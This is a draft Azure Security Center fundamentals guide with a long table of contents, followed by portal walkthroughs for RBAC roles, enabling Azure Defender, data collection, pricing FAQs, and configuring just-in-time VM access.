SecASC - Tactical Scenarios Guide

Security: Azure Security Center
– Fundamentals
Scenarios and Usage Guide

Table of Contents
Introduction .................................................................................................................................................... 1
1.1 Overview........................................................................................................................................................... 1
1 Use Role-Based Access Control to manage access to your Azure subscription

resources .......................................................................................................................................................... 2
1.1 Permissions in Azure Security Center.................................................................................................... 2
1.2 Roles and Allowed actions ........................................................................................................................ 3
1.3 View access ..................................................................................................................................................... 5
1.4 Add Access ...................................................................................................................................................... 6
1.5 Remove Access .............................................................................................................................................. 7
2 Azure Defender...................................................................................................................................... 8
2.1 Introduction to Azure Defender .............................................................................................................. 8
2.2 Enable Azure Defender ............................................................................................................................ 14

Enable Azure Defender Quickstart ........................................................................... 14
Enable Azure Defender from Pricing & Settings ..................................................... 15
Enable Data Collection ............................................................................................. 17
2.3 Azure Defender Dashboard ................................................................................................................... 24

Walk-through Azure Defender Dashboard .............................................................. 24
2.4 Azure Defender for Servers .................................................................................................................... 25

Just-in-time (JIT) VM access .................................................................................... 25
Simulate and detect attacks on Linux ...................................................................... 32
Alerts validation ....................................................................................................... 41
Security Center's integrated EDR solution Microsoft Defender for Endpoint ........ 43
Azure Defender's integrated vulnerability assessment solution ............................. 51
Adaptive Application Control .................................................................................. 54
File Integrity Monitoring .......................................................................................... 63
2.5 Azure Defender for Key Vault ............................................................................................................... 75
ii
Security: Azure Security Center – Fundamentals, Version Error! Unknown document property name. Draft
"SecASC_Tactical Scenarios Guide"
Microsoft Confidential
Pre-requisites ........................................................................................................... 76
Enable Key Vault in Security Center's pricing and settings page ........................... 76
Create an Azure Key Vault and enable Azure Defender protection ........................ 77
Create a new secret in the Key Vault ....................................................................... 77
Simulate a suspicious activity against Key Vault and check Azure Security Center
notification ............................................................................................................................. 78
Respond to Azure Defender for Key Vault alerts .................................................... 80
2.6 Azure Defender for SQL Servers on Machines................................................................................ 82

Pre-requisites ........................................................................................................... 82
Explore vulnerability assessment reports ................................................................ 84
Azure Defender for SQL alerts ................................................................................. 87
2.7 Azure Defender Security Alerts Guide ............................................................................................... 87
2.8 Azure Security Center threat intelligence report ........................................................................... 88

How to access the threat intelligence report .......................................................... 89
3 Connect your non-Azure machines to Security Center ........................................................ 91

Add non-Azure machines with Azure Arc ................................................................ 91
Add non-Azure Windows Machines with Getting started ....................................... 96
Add non-Azure Linux Machines with Getting started ........................................... 100
Connecting computers to Log Analytics gateway ................................................. 106
Onboard Windows computers through Windows Administrative Center (WAC) .. 109
Clean up resources ................................................................................................. 113
4 Monitor Security Health ................................................................................................................ 115

4.1 Resource security Hygiene ................................................................................................................... 115
4.2 Compute Health and Inventory .......................................................................................................... 119
4.3 Implement Security Recommendations .......................................................................................... 122
4.4 Review and Implement Security Recommendations .................................................................. 123
5 Regulatory Compliance ................................................................................................................. 125

5.1 Assessing your regulatory compliance ............................................................................................ 125
Explore the Compliance dashboard ....................................................................... 126
Improve your compliance posture ......................................................................... 128

iii
6 Automate Incident Response with Workflow Automation ............................................... 130
Create a GitHub account ........................................................................................ 130
Explore the Azure Security Center repository ....................................................... 132
6.2 Create a Network Security Group ...................................................................................................... 132
6.3 Create Inbound and Outbound Deny Rules for the new NSG ............................................... 133
6.4 Create Azure Automation Account and Runbook....................................................................... 135
6.5 Create a Workflow Automation.......................................................................................................... 143
6.6 Bypass AppLocker and Remediate .................................................................................................... 152
6.7 Troubleshooting Runbook ................................................................................................................... 156
6.8 Attach the isolated VM’s network interface back to previous network .............................. 160
7 Secure Score ...................................................................................................................................... 163

7.1 Introduction to Secure Score .............................................................................................................. 163
Try Recommendations grouped Security Controls ................................................ 164
How the Secure Score is calculated ....................................................................... 165
Which recommendations are included in the secure score calculations? ............ 168
Secure score FAQ ................................................................................................... 169
8 Security Policies ................................................................................................................................ 170

8.1 Introduction to security policies ........................................................................................................ 170
Using custom security policies .............................................................................. 170
Create a custom initiative ...................................................................................... 170
Adding a dynamic compliance package ................................................................ 173
Update to the Azure CIS 1.1.0 dynamic compliance p ackage ............................... 173
9 Azure Policy ....................................................................................................................................... 175

9.1 What is Azure Policy? ............................................................................................................................. 175
9.2 How is it different from RBAC? ........................................................................................................... 175

Policy definition ..................................................................................................... 176
Prevent misconfigurations ..................................................................................... 182
10 Log Analytics ..................................................................................................................................... 187
iv
10.1 All Security Events ................................................................................................................................... 187
10.2 Failed logons ............................................................................................................................................. 187
10.3 Computers with most errors................................................................................................................ 187
10.4 Heartbeat missing in the last day ...................................................................................................... 188
10.5 Processor utilization over the last week .......................................................................................... 188
10.6 Query data across workspaces ........................................................................................................... 189
11 Post-Breach Threat Detections ................................................................................................... 190

11.1 Pre-requisites ............................................................................................................................................ 190
11.2 Executing the Attack ............................................................................................................................... 192
11.3 Reviewing Security Center Alerts ....................................................................................................... 193

Suspicious SVCHOST process executed ................................................................. 195
Suspicious Activity Detected ................................................................................. 196
Windows registry persistence method detected ................................................... 197
Potential attempt to bypass AppLocker detected ................................................. 198
11.4 Using Log Analytics to Hunt Threats ................................................................................................ 199
12 PowerShell Automation of ASC Tasks ...................................................................................... 203

12.1 Install the ASC PowerShell module ................................................................................................... 203
12.2 Run module to get alerts ...................................................................................................................... 203
12.3 Setting Security Contact Details Across Mulitple Subscriptions (optional) ....................... 204
13 Continuously export Security Center data .............................................................................. 205
14 Management Groups ..................................................................................................................... 207

Overview ................................................................................................................. 207
Create a management group structure ................................................................. 207
15 Blueprints ............................................................................................................................................ 209

Overview ................................................................................................................. 209
How it's different from Azure Policy...................................................................... 209
Blueprint definition locations ................................................................................ 209
Blueprint parameters ............................................................................................. 210
v
Create a Blueprint .................................................................................................. 210
Assign a blueprint .................................................................................................. 211
Track deployment of a blueprint ........................................................................... 212
16 Troubleshoot ..................................................................................................................................... 214

16.1 Log Analytics agent for Windows ...................................................................................................... 214
Important troubleshooting sources ....................................................................... 214
16.2 Log Analytics agent for Linux .............................................................................................................. 220

Issues and Resolutions ........................................................................................... 227
16.3 Azure Arc..................................................................................................................................................... 237

Agent verbose loging............................................................................................. 238
17 Resource Graph ................................................................................................................................ 244

Overview ................................................................................................................. 244
Explore Resource Graph ......................................................................................... 244
FAQ................................................................................................................................................................ 246
17.2 How does Azure Security Center relate to Azure Sentinel? ..................................................... 246
17.3 Connect Azure Security Center data to Azure Sentinel ............................................................. 247
17.4 Exporting data to a SIEM ...................................................................................................................... 248
17.5 What are the Log Analytics Agent Timeouts?............................................................................... 250
17.6 What can we do with PowerShell? .................................................................................................... 250
17.7 What is missing if Log Analytics is not installed? ........................................................................ 250
vi
Introduction
Microsoft Azure Security Center provides unified security management and advanced threat
protection across hybrid cloud workloads. With Security Center, you can apply security policies
across your workloads, limit your exposure to threats, and detect and respond to attacks.
Where possible, this guide will link to online instructions instead of providing them since
Azure screenshots and navigation tend to change often.
1.1 Overview
The following guide will walk you through implementing Azure Security Center (ASC):
• Azure Security Center Permissions with Role-Based Access Control (RBAC)

• Turn on Azure Defender trial and Enable Data Collection
• Add non-Azure machines to Security Center
• Monitor Security Health
• Review and Implement Security Recommendations
• Alerts validation
• Enable Just-in-Time access
• Azure Defender for Key Vault
• Log Analytics
• Simulate and detect attacks on Linux
• Automate Incident Response with Workflow Automation
• Enable File Integrity Monitoring
• Enable Adaptive Application Control
• Post-Breach Threat Detections
• Using PowerShell to get alerts
• Regulatory Compliance
• Security Policies
• Blueprints
Page 1
Security: Azure Security Center – Fundamentals
1 Use Role-Based Access Control to manage access
to your Azure subscription resources
Azure Role-Based Access Control (RBAC) enables fine-grained access management for Azure.
Using RBAC, you can grant only the amount of access that users need to perform their jobs. This
article helps you get up and running with RBAC in the Azure portal. If you want more details
about how RBAC helps you manage access, see What is Role-Based Access Control.
Within each subscription, you can grant up to 2000 role assignments.
1.1 Permissions in Azure Security Center

Azure Security Center uses Role-Based Access Control (RBAC), which provides built-in roles that
can be assigned to users, groups, and services in Azure.
Security Center assesses the configuration of your resources to identify security issues and
vulnerabilities. In Security Center, you only see information related to a resource when you are
assigned the role of Owner, Contributor, or Reader for the subscription or resource group that a
resource belongs to.
This means that workload owners can see (and action) security recommendations for their
workloads by default, but access outside those roles needs to be delegated. If a person has no
access to a resource, they won’t see that resource in their view from Azure Security Center.
In addition to these roles, there are two specific Security Center roles:
• Security Reader: A user that belongs to this role has viewing rights to Security Center.
The user can view recommendations, alerts, a security policy, and security states, but
cannot make changes.
• Security Administrator: A user that belongs to this role has the same rights as the
Security Reader and can also update the security policy and dismiss alerts and
recommendations. For more information about permissions, please refer to
https://docs.microsoft.com/en-us/azure/role-based-access-control/built-in-
roles#security-admin.
Page 2
1.2 Roles and Allowed actions
The following table displays roles and allowed actions in Security Center. An X indicates that the
action is allowed for that role.
Note that in the table below, Contributor (or greater) access is needed to the resource itself in
order to make a change to the resource directly (“apply security recommendations”).
Page 3
Page 4
1.3 View access
You can see who has access to a resource, resource group, or subscription from its main blade in
the Azure portal. For example, if we want to see who has access to one of our resource groups:
1. Select Resource groups in the navigation bar on the left.
2. Select the name of the resource group from the Resource groups blade.
3. Select Access control (IAM) from the left menu.
4. The Access control blade lists all users, groups, and applications that have been granted
access to the resource group.
Notice that some roles are scoped to This resource while others are Inherited from
another scope.
Access is either assigned specifically to a resource group or inherited from an

assignment to the parent subscription.
Note
Classic subscription admins and co-admins are considered Owners of a subscription in
the new RBAC model.
Page 5
1.4 Add Access
You grant access from the resource, resource group, or subscription that is the scope of the role
assignment.
1. Open a resource, resource group or subscription.
2. Select Add on the Access control blade.
3. Select the role that you wish to assign from the Select a role blade.
4. Select the user, group, or application in your directory that you wish to grant access to.
You can search the directory with display names, email addresses, and object identifiers.
5. Select OK to create the assignment. The Adding user popup tracks the progress.
After successfully adding a role assignment, it will appear on the Users blade.
Page 6
1.5 Remove Access
1. Hover your cursor over the name of the assignment that you want to remove. A check box
appears next to the name.
2. Use the check boxes to select one or more role assignments.
3. Select Remove.
4. Select Yes to confirm the removal.
Inherited assignments cannot be removed. If you need to remove an inherited assignment, you
need to do it at the scope where the role assignment was created. In the Scope column, next to
Inherited there is a link that takes you to the resources where this role was assigned. Go to the
resource listed there to remove the role assignment.
Note
To learn more about RBAC Roles:
Built-in Roles
Custom Roles
Azure Role-Based Access Control (RBAC) enables fine-grained access management for Azure.
Using RBAC, you can grant only the amount of access that users need to perform their jobs. This
article helps you get up and running with RBAC in the Azure portal. If you want more details
about how RBAC helps you manage access
https://docs.microsoft.com/en-us/azure/active-directory/role-based-access-control-configure
Page 7
2 Azure Defender
2.1 Introduction to Azure Defender

Azure Security Center's features cover the two broad pillars of cloud security:
• Cloud security posture management (CSPM) - Security Center is available

for free to all Azure users. The free experience includes CSPM features such as
secure score, detection of security misconfigurations in your Azure machines,
asset inventory, and more. Use these CSPM features to strengthen your hybrid
cloud posture and track compliance with the built-in policies.
• Cloud workload protection (CWP) - Security Center's integrated cloud

workload protection platform (CWPP), Azure Defender, brings advanced,
intelligent, protection of your Azure and hybrid resources and workloads.
Enabling Azure Defender brings a range of additional security features as
described on this page. In addition to the built-in policies, when you've enabled
any Azure Defender plan, you can add custom policies and initiatives. You can
add regulatory standards - such as NIST and Azure CIS - as well as the Azure
Security Benchmark for a truly customized view of your compliance.
Page 8
The Azure Defender dashboard in Security Center provides visibility and control of the
CWP features for your environment:
What resource types can Azure Defender secure?
Azure Defender provides security alerts and advanced threat protection for virtual machines,
SQL databases, containers, web applications, your network, and more.
When you enable Azure Defender from the Pricing and settings area of Azure Security Center,
the following Defender plans are all enabled simultaneously and provide comprehensive
defenses for the compute, data, and service layers of your environment:
• Azure Defender for servers

• Azure Defender for App Service
• Azure Defender for Storage
• Azure Defender for SQL
• Azure Defender for Kubernetes
• Azure Defender for container registries
• Azure Defender for Key Vault
Page 9
Hybrid cloud protection
As well as defending your Azure environment, you can add Azure Defender capabilities to your
hybrid cloud environment:
• Protect your non-Azure servers

• Protect your virtual machines in other clouds (such as AWS and GCP)
You'll get customized threat intelligence and prioritized alerts according to your specific
environment so that you can focus on what matters the most.
To extend protection to virtual machines and SQL databases that are in other clouds or on-
premises, deploy Azure Arc and enable Azure Defender. Azure Arc for servers is a free service,
but services that are used on Arc enabled servers, for example Azure Defender, will be charged
as per the pricing for that service. Learn more in Add non-Azure machines with Azure Arc.
Pricing of Azure Security Center
Free option vs Azure Defender enabled
Azure Defender OFF (Free) - Security Center without Azure Defender is enabled for free on all
your Azure subscriptions when you visit the Azure Security Center dashboard in the Azure portal
for the first time, or if enabled programmatically via API. Using this free mode provides security
policy, continuous security assessment, and actionable security recommendations to help you
protect your Azure resources.
Azure Defender ON - Enabling Azure Defender extends the capabilities of the free mode to
workloads running in private and other public clouds, providing unified security management
and threat protection across your hybrid cloud workloads. Some of the major features of Azure
Defender:
Microsoft Defender for Endpoint - Azure Defender for servers includes Microsoft Defender for
Endpoint for comprehensive endpoint detection and response (EDR). Learn more about the
benefits of using Microsoft Defender for Endpoint together with Azure Defender in Use Security
Center's integrated EDR solution.
Vulnerability scanning for virtual machines and container registries - Easily deploy a
scanner to all of your virtual machines that provides the industry's most advanced solution for
vulnerability management. View, investigate, and remediate the findings directly within Security
Center.
Page 10
Hybrid security – Get a unified view of security across all of your on-premises and cloud
workloads. Apply security policies and continuously assess the security of your hybrid cloud
workloads to ensure compliance with security standards. Collect, search, and analyze security
data from multiple sources, including firewalls and other partner solutions.
Threat protection alerts - Advanced behavioral analytics and the Microsoft Intelligent Security
Graph provide an edge over evolving cyber-attacks. Leverage built-in behavioral analytics and
machine learning to identify attacks and zero-day exploits. Monitor networks, machines, and
cloud services for incoming attacks and post-breach activity. Streamline investigation with
interactive tools and contextual threat intelligence.
Access and application controls - Block malware and other unwanted applications by applying
machine learning powered recommendations adapted to your specific workloads to create allow
and deny lists. Reduce the network attack surface with just-in-time, controlled access to
management ports on Azure VMs. This drastically reduces exposure to brute force and other
network attacks.
Container security features - Benefit from vulnerability management and real-time threat
protection on your containerized environments. When enabling the Azure Defender for
container registries, it may take up to 12hrs until all the features are enabled. Charges are
based on the number of unique container images pushed to your connected registry. After an
image has been scanned once, you won't be charged for it again unless it's modified and
pushed once more.
Pricing details
Azure Security Center protects Azure, on prem and hybrid resources through its Free tier and its
integration with Azure Defender.
When you enable Azure Defender, we automatically enroll and start protecting all your
resources unless you explicitly decide to opt-out. For any resource that is protected by Azure
Defender, you will be charged per the pricing model below.
Page 11
Features AZURE SECURITY AZURE DEFENDER
CENTER FREE TEIR
Continuous assessment and security recommendations
Azure secure score
Just in time VM Access
Adaptive application controls and network hardening
Regulatory compliance dashboard and reports
Threat protection for Azure VMs and non-Azure servers

(including Server EDR)
Threat protection for PaaS services
Microsoft Defender for Endpoint

(servers)
For threat pricing on threat protection capabilities Azure Defender provides, please
visit: Azure Defender Pricing Page.
Try Azure Defender free for 30 days
Azure Defender is free for the first 30 days. At the end of 30 days, should you choose to
continue using the service, we'll automatically start charging for usage.
Page 12
FAQ Pricing and Billing
Can I enable Azure Defender for servers on a subset of servers in my subscription?
No. When you enable Azure Defender for servers on a subscription, all the servers in the
subscription will be protected by Azure Defender.
An alternative is to enable Azure Defender for servers at the Log Analytics workspace level. If you do
this, only servers reporting to that workspace will be protected and billed. However, several
capabilities will be unavailable. These include just-in-time VM access, network detections, regulatory
compliance, adaptive network hardening, adaptive application control, and more.
My subscription has Azure Defender for servers enabled, do I pay for not-running servers?
No. When you enable Azure Defender for servers on a subscription, you'll be billed hourly for
running servers only. You won't be charged for any server that's turned off, during the time it's off.
This also applies to the other resource types protected by Security Center.
Will I be charged for machines without the Log Analytics agent installed?
Yes. When you enable Azure Defender for servers on a subscription, the machines in that
subscription get a range of protections even if you haven't installed the Log Analytics agent.
If a Log Analytics agent reports to multiple workspaces, will I be charged twice?
Yes. If you've configured your Log Analytics agent to send data to two or more different Log
Analytics workspaces (multi-homing), you'll be charged for every workspace that has a 'Security' or
'AntiMalware' solutions installed.
If a Log Analytics agent reports to multiple workspaces, is the 500-MB free data ingestion
available on all of them?
Yes. If you've configured your Log Analytics agent to send data to two or more different Log
Analytics workspaces (multi-homing), you'll get 500-MB free data ingestion. It's calculated per node,
per reported workspace, per day, and available for every workspace that has a 'Security' or
'AntiMalware' solutions installed. You'll be charged for any data ingested over the 500 MB.
How can I track who in my organization enabled Azure Defender changes in Azure
Security Center
Azure Subscriptions may have multiple administrators with permissions to change the pricing
settings. To find out which user made a change, use the Azure Activity Log.
Page 13
If the user's info isn't listed in the Event initiated by column, explore the event for the relevant
details.
2.2 Enable Azure Defender

Prerequisites
To get started with Security Center, you must have a subscription to Microsoft Azure. If you do
not have a subscription, you can sign up for a free account.
To enable Azure Defender on a subscription, you must be assigned the role of Subscription
Owner, Subscription Contributor, or Security Admin.
Enable Azure Defender Quickstart
Security Center has a quickstart option available that helps you enable Azure Defender on
multiple subscriptions and workspaces. If you want to use quick start option to enable Azure
Defender on multiple subscriptions and workspaces continue with the steps below. You can also
enable Azure Defender on a single subscription using the Pricing & settings option. If you want
to use the Pricing & settings option skip to the next section.
1. From Security Center's sidebar, select Getting started.
Page 14
2. The Upgrade tab lists subscriptions and workspaces eligible for onboarding.
3. From the Select workspaces to enable Azure Defender on list, select the workspaces and
subscriptions to upgrade.
Important:
• If you select subscriptions and workspaces that aren't eligible for trial, the next step will
upgrade them and charges will begin.
• If you select a workspace that's eligible for a free trial, the next step will begin a trial.
4. Select Upgrade to enable Azure Defender.
Enable Azure Defender from Pricing & Settings

You can protect an entire Azure subscription with Azure Defender and the protections will be
inherited by all resources within the subscription.
To enable Azure Defender:
Page 15
1. From Security Center's main menu, select Pricing & settings.
2. Select the subscription that you want to upgrade.
3. Select Azure Defender on to upgrade.
4. Select Save.
Important:
• To enable all Security Center features including threat protection capabilities,

you must enable Azure Defender on the subscription containing the applicable
workloads.
• Enabling Azure Defender at the workspace level doesn't enable just-in-time VM
access, adaptive application controls, and network detections for Azure resources.
In addition, the only Azure Defender plans available at the workspace level are
Azure Defender for servers and Azure Defender for SQL servers on machines.
• You can enable Azure Defender for Storage accounts at either the subscription
level or resource level. You can enable Azure Defender for SQL at either the
subscription level or resource level. You can enable threat protection for Azure
Database for MariaDB/ MySQL/ PostgreSQL at the resource level only.
Page 16
Enable Data Collection
Security Center collects data from your Azure virtual machines (VMs), virtual machine scale sets,
IaaS containers, and non-Azure (including on-premises) machines to monitor for security
vulnerabilities and threats.
Data collection is required to provide visibility into missing updates, misconfigured OS security
settings, endpoint protection status, and health and threat protection. Data collection is only
needed for compute resources (VMs, virtual machine scale sets, IaaS containers, and non-Azure
computers). You can benefit from Azure Security Center even if you don’t provision agents;
however, you will have limited security and the capabilities listed above are not supported.
Data is collected using:

• The Log Analytics agent, which reads various security-related configurations and event
logs from the machine and copies the data to your workspace for analysis. Examples of
such data are: operating system type and version, operating system logs (Windows event
logs), running processes, machine name, IP addresses, and logged in user.
• Security extensions, such as the Azure Policy Add-on for Kubernetes, which can also
provide data to Security Center regarding specialized resource types.
Why use auto provisioning?
Any of the agents and extensions described on this page can be installed manually (see Manual
installation of the Log Analytics agent). However, auto provisioning reduces management
overhead by installing all required agents and extensions on existing - and new - machines to
ensure faster security coverage for all supported resources.
We recommend enabling auto provisioning, but it's disabled by default.
How does auto provisioning work?
Security Center's auto provisioning settings have a toggle for each type of supported extension.
When you enable auto provisioning of an extension, you assign the appropriate Deploy if not
exists policy to make sure that the extension is provisioned on all existing and future resources
of that type.
Page 17
Enable Auto provisioning in the Customer Subscription(s) - Auto provisioning agents and
extensions from Azure Security Center| Microsoft Docs
Enable automatic provisioning of Log Analytics Agent
When automatic provisioning is on for the Log Analytics agent, Security Center deploys the
agent on all supported Azure VMs and any new ones created. For the list of supported
platforms, see Supported platforms in Azure Security Center.
To enable auto provisioning of the Log Analytics agent:
1. From Security Center's menu, select Pricing & settings.
2. Select the relevant subscription.
3. In the Auto provisioning page, set the agent's status to On.
4. From the configuration options pane, define the workspace to use. You will have 2 Options:
• Connect Azure VMs to the default workspace(s) created by Security Center
• Connect Azure VMs to a different workspace
Connect Azure VMs to the default workspace(s) created by Security Center - Security
Center creates a new resource group and default workspace in the same geolocation, and
connects the agent to that workspace. If a subscription contains VMs from multiple
Page 18
geolocations, Security Center creates multiple workspaces to ensure compliance with data
privacy requirements.
The naming convention for the workspace and resource group is:
• Workspace: DefaultWorkspace-[subscription-ID]-[geo]
• Resource Group: DefaultResourceGroup-[geo]
Security Center automatically enables a Security Center solution on the workspace per the
pricing tier set for the subscription.
Connect Azure VMs to a different workspace - From the dropdown list, select the workspace
to store collected data. The dropdown list includes all workspaces across all of your
subscriptions. You can use this option to collect data from virtual machines running in different
subscriptions and store it all in your selected workspace.
If you already have an existing Log Analytics workspace, you might want to use the same
workspace (requires read and write permissions on the workspace). This option is useful if you're
using a centralized workspace in your organization and want to use it for security data
collection. Learn more in Manage access to log data and workspaces in Azure Monitor.
If your selected workspace already has a Security or SecurityCenterFree solution enabled, the
pricing will be set automatically. If not, install a Security Center solution on the workspace:
A. From Security Center's menu, open Pricing & settings.
B. Select the workspace to which you'll be connecting the agents.
C. Select Azure Defender on or Azure Defender off.
5. From the Windows security events configuration, select the amount of raw event data to
store:
• None – Disable security event storage. This is the default setting.

• Minimal – A small set of events for when you want to minimize the event volume.
• Common – A set of events that satisfies most customers and provides a full audit trail.
• All events – For customers who want to make sure all events are stored.
Azure Defender is required for storing Windows security event data. For more information on
event types see section What event types are stored for “Common” and Minimal”
Selecting a data collection tier in Azure Security Center only affects the storage of security
events in your Log Analytics workspace. The Log Analytics agent will still collect and analyze the
Page 19
security events required for Security Center’s threat protection, regardless of the level of security
events you choose to store in your workspace. Choosing to store security events enables
investigation, search, and auditing of those events in your workspace.
6. Select Apply in the configuration pane.

7. Select Save. If a workspace needs to be provisioned, agent installation might take up to 25
minutes.
8. You'll be asked if you want to reconfigure monitored VMs that were previously connected to
a default workspace:
• No - your new workspace settings will only be applied to newly discovered VMs that
don't have the Log Analytics agent installed.
• Yes - your new workspace settings will apply to all VMs and every VM currently
connected to a Security Center created workspace will be reconnected to the new
target workspace.
Important: If you select Yes, don't delete the workspace(s) created by Security Center
until all VMs have been reconnected to the new target workspace. This operation fails if
a workspace is deleted too early.
Enable auto provisioning of extensions
To enable automatic provisioning of an extension other than the Log Analytics agent:
1. From Security Center's menu in the Azure portal, select Pricing & settings.
3. Select Auto provisioning.
4. If you're enabling auto provisioning for the Microsoft Dependency agent, ensure the Log
Analytics agent is set to auto deploy too.
5. Toggle the status to On for the relevant extension.
Page 20
6. Select Save. The Azure policy is assigned and a remediation task is created.
Extension Policy
Policy Add-on for Kubernetes Deploy Azure Policy Add-on to Azure Kubernetes
Service clusters
Microsoft Dependency agent (preview) (Windows VMs) Deploy Dependency agent for Windows virtual
machines
Microsoft Dependency agent (preview) (Linux VMs) Deploy Dependency agent for Linux virtual machines
What event types are stored for "Common" and "Minimal"?
These sets were designed to address typical scenarios. Make sure to evaluate which one fits your
needs before implementing it.
To determine the events for the Common and Minimal options, we worked with customers and
industry standards to learn about the unfiltered frequency of each event and their usage. We
used the following guidelines in this process:
• Minimal - Make sure that this set covers only events that might indicate a
successful breach and important events that have a very low volume. For example,
this set contains user successful and failed login (event IDs 4624, 4625), but it
doesn’t contain sign out which is important for auditing but not meaningful for
detection and has relatively high volume. Most of the data volume of this set is the
login events and process creation event (event ID 4688).
• Common - Provide a full user audit trail in this set. For example, this set contains
both user logins and user sign outs (event ID 4634). We include auditing actions
like security group changes, key domain controller Kerberos operations, and other
events that are recommended by industry organizations.
Page 21
Events that have very low volume were included in the Common set as the main motivation to
choose it over all the events is to reduce the volume and not to filter out specific events.
Information for Azure Sentinel users
Users of Azure Sentinel: note that security events collection within the context of a single
workspace can be configured from either Azure Security Center or Azure Sentinel, but not both.
If you're planning to add Azure Sentinel to a workspace that is already getting Azure Defender
alerts from Azure Security Center, and is set to collect Security Events, you have two options:
• Leave the Security Events collection in Azure Security Center as is. You will be able to query
and analyze these events in Azure Sentinel as well as in Azure Defender. You will not,
however, be able to monitor the connector's connectivity status or change its configuration
in Azure Sentinel. If this is important to you, consider the second option.
• Disable Security Events collection in Azure Security Center (by setting Windows security
events to None in the configuration of your Log Analytics agent). Then add the Security
Events connector in Azure Sentinel. As with the first option, you will be able to query and
analyze events in both Azure Sentinel and Azure Defender/ASC, but you will now be able to
monitor the connector's connectivity status or change its configuration in - and only in -
Azure Sentinel.
Disable auto provisioning
When you disable auto provisioning, agents will not be provisioned on new VMs.
Note
Disabling automatic provisioning limits security monitoring for your resources.
To turn off automatic provisioning of an agent:
1. From Security Center's menu in the portal, select Pricing & settings.
3. Select Auto provisioning.
4. Toggle the status to Off for the relevant agent.
Page 22
5. Select Save. When auto provisioning is disabled, the default workspace configuration section
is not displayed:
Note
Disabling automatic provisioning does not remove the Log Analytics agent from Azure VMs
where the agent was provisioned. For information on removing the OMS extension, see How do
I remove OMS extensions installed by Security Center.
Page 23
2.3 Azure Defender Dashboard
The Azure Defender dashboard provides:
• Visibility into your Azure Defender coverage across your different resource
types
• Links to configure advanced threat protection capabilities
• The onboarding state and agent installation
• Azure Defender threat detection alerts
To access the Azure Defender dashboard, select Azure Defender from the Cloud Security
section of Security Center's menu.
Walk-through Azure Defender Dashboard
In the customers environment walk-through, each of the Azure Defender sections.
The dashboard includes the following sections:

1. Azure Defender coverage - Here you can see the resources types that are in your
subscription and eligible for protection by Azure Defender. Wherever relevant,
you'll have the option to upgrade too. If you want to upgrade all possible eligible
resources, select Upgrade all.
Page 24
2. Security alerts area - When Azure Defender detects a threat in any area of your
environment, it generates an alert. These alerts describe details of the affected
resources, suggested remediation steps, and in some cases an option to trigger a
logic app in response. Selecting anywhere in this graph opens the Security alerts
page.
3. Advanced protection - Azure Defender includes many advanced threat protection
capabilities for virtual machines, SQL databases, containers, web applications, your
network, and more. In this advanced protection section, you can see the status of
the resources in your selected subscriptions for each of these protections. Select
any of them to go directly to the configuration area for that protection type.
4. Insights - This rolling pane of news, suggested reading, and high priority alerts
gives Security Center's insights into pressing security matters that are relevant to
you and your subscription. Whether it's a list of high severity CVEs discovered on
your VMs by a vulnerability analysis tool, or a new blog post by a member of the
Security Center team, you'll find it here in the Insights pane of your Azure Defender
dashboard.
2.4 Azure Defender for Servers
Just-in-time (JIT) VM access

Threat actors actively hunt accessible machines with open management ports, like RDP or SSH.
All of your virtual machines are potential targets for an attack. When a VM is successfully
compromised, it's used as the entry point to attack further resources within your environment.
Pre-requisites
JIT requires Azure Defender for servers to be enabled on the subscription.
Reader and SecurityReader roles can both view the JIT status and parameters.
Page 25
Enable Azure Defender for Servers in Security Center's pricing and settings
page
Go to Azure Security Center Settings & settings page, select the relevant subscription, and
enable Servers in the Azure Defender plans page.
How JIT operates with network security groups and Azure Firewall
When you enable just-in-time VM access, you can select the ports on the VM to which inbound
traffic will be blocked. Security Center ensures "deny all inbound traffic" rules exist for your
selected ports in the network security group (NSG) and Azure Firewall rules. These rules restrict
access to your Azure VMs’ management ports and defend them from attack.
Page 26
If other rules already exist for the selected ports, then those existing rules take priority over the
new "deny all inbound traffic" rules. If there are no existing rules on the selected ports, then the
new rules take top priority in the NSG and Azure Firewall.
When a user requests access to a VM, Security Center checks that the user has Azure role-based
access control (Azure RBAC) permissions for that VM. If the request is approved, Security Center
configures the NSGs and Azure Firewall to allow inbound traffic to the selected ports from the
relevant IP address (or range), for the amount of time that was specified. After the time has
expired, Security Center restores the NSGs to their previous states. Connections that are already
established are not interrupted.
How Security Center identifies which VMs should have JIT applied:
Page 27
Enable JIT from Azure Security Center
From Security Center, you can enable and configure the JIT VM access.
1. Open the Azure Defender dashboard and from the advanced protection area, select Just-in-
time VM access.
The Just-in-time VM access page opens with your VMs grouped into the following tabs:
• Configured - VMs that have been already been configured to support just-in-time VM
access. For each VM, the configured tab shows:
• the number of approved JIT requests in the last seven days
• the last access date and time
• the connection details configured
• the last user
• Not configured - VMs without JIT enabled, but that can support JIT. We recommend
that you enable JIT for these VMs.
• Unsupported - VMs without JIT enabled and which don't support the feature. Your VM
might be in this tab for the following reasons:
• Missing network security group (NSG) - JIT requires an NSG to be configured
• Classic VM - JIT supports VMs that are deployed through Azure Resource
Manager, not 'classic deployment'. Learn more about classic vs Azure Resource
Manager deployment models.
• Other - Your VM might be in this tab if the JIT solution is disabled in the security
policy of the subscription or the resource group.
2. From the Not configured tab, mark the VMs to protect with JIT and select Enable JIT on
VMs.
The JIT VM access page opens listing the ports that Security Center recommends
protecting:
• 22 - SSH
• 3389 - RDP
• 5985 - WinRM
• 5986 - WinRM
To accept the default settings, select Save.
3. To customize the JIT options:
• Add custom ports with the Add button.

Page 28
• Modify one of the default ports, by selecting it from the list.
For each port (custom and default) the Add port configuration pane offers the
following options:
• Protocol- The protocol that is allowed on this port when a request is approved
• Allowed source IPs- The IP ranges that are allowed on this port when a request is
approved
• Maximum request time- The maximum time window during which a specific port
can be opened
Set the port security to your needs.

o
Select OK.
o
4. Select Save.
Editing JIT Configuration in Security Center
You can change a VM's existing just in time policy by adding and configuring a new port to
open for that VM, or by changing any other parameter related to an already protected port.
In order to edit an existing just in time policy of a VM, the Configured tab is used:
1. Under VMs, select a VM to add a port to by clicking on the three dots within the row for
that VM. This opens a menu.
2. Select Edit in the menu. This opens JIT VM access configuration.
Page 29
3. Under JIT VM access configuration, you can either edit the existing settings of an already
protected port by clicking on its port, or you can select Add. This opens Add port
configuration.
4. Under Add port configuration, identify the port, protocol type, allowed source IPs, and
maximum request time.
5. Select OK.
6. Select Save.
Page 30
Request access to a JIT-enabled VM from Azure Security Center
1. From the Just-in-time VM access page, select the Configured tab.

2. Mark the VMs you want to access.
• The icon in the Connection Details column indicates whether JIT is enabled on
the network security group or firewall. If it's enabled on both, only the firewall
icon appears.
• The Connection Details column provides the information required to connect
the VM, and its open ports.
